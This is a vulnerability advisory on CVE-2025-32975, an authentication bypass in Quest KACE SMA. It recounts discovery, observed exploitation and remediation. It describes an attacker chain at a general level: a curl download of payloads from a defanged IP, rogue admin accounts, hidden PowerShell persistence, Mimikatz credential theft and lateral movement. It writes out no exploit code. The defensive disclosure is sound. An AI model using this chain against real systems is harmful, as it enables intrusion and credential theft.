CVE-2025-32975

What is Quest KACE SMA?

Quest KACE Systems Management Appliance (SMA) is an on-premises IT endpoint management platform widely deployed in enterprise, government, healthcare, and education environments. It provides centralized inventory, software deployment, patch management, OS imaging, and monitoring across Windows, macOS, and Linux endpoints — often managing thousands of devices from a single web-based console. Because KACE SMA holds administrative credentials and has the ability to remotely execute code on every managed device, it represents a highly valuable target: compromising the appliance can provide an attacker with effectively unlimited lateral movement across the entire managed endpoint estate.

KACE SMA is typically exposed to internal networks, and in some configurations to the internet, for remote management purposes.

Overview

CVE-2025-32975 is a maximum-severity authentication bypass in the Single Sign-On (SSO) authentication handling mechanism of Quest KACE SMA. An unauthenticated remote attacker can exploit a flaw in how the appliance processes SSO authentication requests to impersonate any legitimate user, including administrator accounts, without possessing valid credentials. Successful exploitation results in complete administrative takeover of the appliance and, by extension, command execution capability on every device it manages.

Affected Versions

Technical Details

The vulnerability exists in KACE SMA's SSO authentication handling mechanism. SSO implementations typically allow users to authenticate via an external identity provider (IdP) by presenting a token or assertion that the appliance validates. The flaw in KACE SMA's SSO handler allows an attacker to craft or manipulate the authentication assertion in a way that the appliance accepts as valid for any specified username — bypassing the credential verification step entirely.

The resulting access is equivalent to logging in as the targeted user. When targeting an administrator account, the attacker gains full administrative control over the KACE SMA console.

What a fully compromised KACE SMA enables:

• Execute arbitrary commands on all managed endpoints via KACE's built-in scripting and software deployment features
• Create new administrator accounts for persistent access
• Access all managed device inventories, credentials, and configurations
• Deploy malware, ransomware, or persistent implants across the entire managed device fleet
• Exfiltrate sensitive configuration data and credentials stored in the appliance

Attack characteristics:

• Authentication required: None
• Attack complexity: Low
• Network-accessible: Yes
• User interaction: None
• Scope: Changed (impact extends beyond the appliance to all managed endpoints)

Discovery

CVE-2025-32975 was discovered by Philippe Caturegli and Mohamed Mahmoudi of Seralys, who submitted the vulnerability report to Quest Software on April 14, 2025. Quest acknowledged receipt the same day, coordinated a fix, and released a public hotfix on May 27, 2025 — approximately six weeks after initial report. Seralys published a high-level public advisory on June 23, 2025, withholding detailed technical information and proof-of-concept code pending broader patch adoption.

Exploitation Context

Beginning the week of March 9, 2026, Arctic Wolf researchers observed active exploitation of unpatched KACE SMA systems exposed to the internet. Threat actors leveraged CVE-2025-32975 to gain initial access and then executed a multi-stage post-exploitation campaign:

Observed attacker actions:

• Executed remote commands to download Base64-encoded payloads from attacker-controlled server 216.126.225[.]156 via curl
• Used runkbot.exe (a legitimate KACE background process for running scripts) to create additional administrator accounts
• Executed PowerShell scripts in hidden contexts to modify Windows Registry keys for persistence
• Deployed Mimikatz for credential harvesting
• Performed Active Directory enumeration to map domain structure
• Conducted lateral movement to backup infrastructure and domain controllers

The attack pattern represents a full enterprise compromise chain: authentication bypass → admin takeover of management appliance → lateral movement to backup systems and domain controllers via the appliance's trusted management access.

The end goal of the attacks was not publicly confirmed at time of reporting, but the TTPs are consistent with pre-ransomware staging or espionage.

Remediation

1. Apply the Quest patch immediately — upgrade to the fixed version for your branch: 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), or 14.1.101 (Patch 4). See Quest KB4379499 for details.
2. Remove KACE SMA from public internet exposure — place it behind a VPN or firewall. The appliance should never be directly internet-accessible.
3. Audit administrator accounts — review all administrator accounts in the KACE SMA console and remove any unauthorized or unrecognized accounts immediately.
4. Review scripting and deployment history — check the KACE SMA audit log and scripting history for any unauthorized script executions, software deployments, or configuration changes during the exposure window.
5. Hunt for compromise indicators: look for runkbot.exe with unusual arguments, PowerShell invocations in hidden windows, unexpected outbound connections (particularly to 216.126.225[.]156), new local/domain administrator accounts, and Mimikatz artifacts on managed endpoints.
6. Rotate credentials: if the appliance has been exposed to the internet since before May 27, 2025 (the patch release date), treat all KACE SMA credentials and any credentials accessible via managed endpoints as potentially compromised.